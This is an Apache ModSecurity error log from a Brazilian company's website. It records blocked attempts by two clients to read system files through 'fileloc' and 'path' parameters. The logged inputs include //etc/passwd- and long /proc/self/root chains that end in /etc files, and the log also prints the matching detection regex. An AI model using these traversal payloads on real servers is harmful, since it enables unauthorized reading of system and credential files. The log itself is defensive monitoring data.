[Fri Mar 20 07:46:03.190907 2026] [:error] [pid 9818:tid 140411574073088] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la11pVZ5mVmJwsFMuNAAAAFQ"]
[Fri Mar 20 07:46:03.278589 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la9a6ubjKNq_cu4bSAwAAA0w"]
[Fri Mar 20 07:46:03.393106 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la11pVZ5mVmJwsFMuNQAAAFI"]
[Fri Mar 20 07:46:03.481214 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la9a6ubjKNq_cu4bSBAAAA0Y"]
[Fri Mar 20 07:46:03.596405 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la11pVZ5mVmJwsFMuNgAAAEs"]
[Fri Mar 20 07:46:03.684081 2026] [:error] [pid 26799:tid 140411674785536] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la9a6ubjKNq_cu4bSBQAAA0g"]
[Fri Mar 20 07:46:03.799457 2026] [:error] [pid 9818:tid 140411548894976] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la11pVZ5mVmJwsFMuNwAAAFc"]
[Fri Mar 20 07:46:03.886322 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0la9a6ubjKNq_cu4bSBgAAA0k"]
[Fri Mar 20 07:46:04.001672 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lbF1pVZ5mVmJwsFMuOQAAAEE"]
[Fri Mar 20 07:46:04.091663 2026] [:error] [pid 26799:tid 140411590858496] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lbNa6ubjKNq_cu4bSBwAAA1I"]
[Fri Mar 20 07:46:04.271240 2026] [:error] [pid 9818:tid 140411565680384] [client 216.73.216.191:9118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lbF1pVZ5mVmJwsFMuOgAAAFU"]
[Fri Mar 20 07:46:04.290502 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:40803] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lbNa6ubjKNq_cu4bSCQAAA0I"]
[Fri Mar 20 07:46:04.390247 2026] [:error] [pid 10189:tid 140411716749056] [client 216.73.216.191:38284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lbDJ3M9BSuKP7CAYYvQAAAIM"]
[Fri Mar 20 07:47:16.085824 2026] [mime_magic:error] [pid 26799:tid 140411599251200] (70014)End of file found: [client 57.141.18.6:46342] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:47:36.931923 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:43106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0lx7ninkcc-iUj5ApdPgAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:47:38.611524 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:34882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0lyvHIg5MgXLBnicP2DQAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:47:59.589488 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:34882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l3_HIg5MgXLBnicP2JAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:00.919830 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:45506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l4BCii7xarUs8iHZl4wAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:02.348558 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:45514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l4rninkcc-iUj5ApdVgAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:03.723059 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:45526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l4-oXxyEfFpUF8f9_hgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:05.043028 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:45536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l5fqxLDW4GITHUkTk-AAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:06.319068 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:45548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l5uoXxyEfFpUF8f9_iQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:10.048790 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:45564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l6vqxLDW4GITHUkTlAAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:12.367851 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:49984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l7PXLqtnMIWvjpaKYsQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:13.976474 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:49994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0l7bninkcc-iUj5ApdXAAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
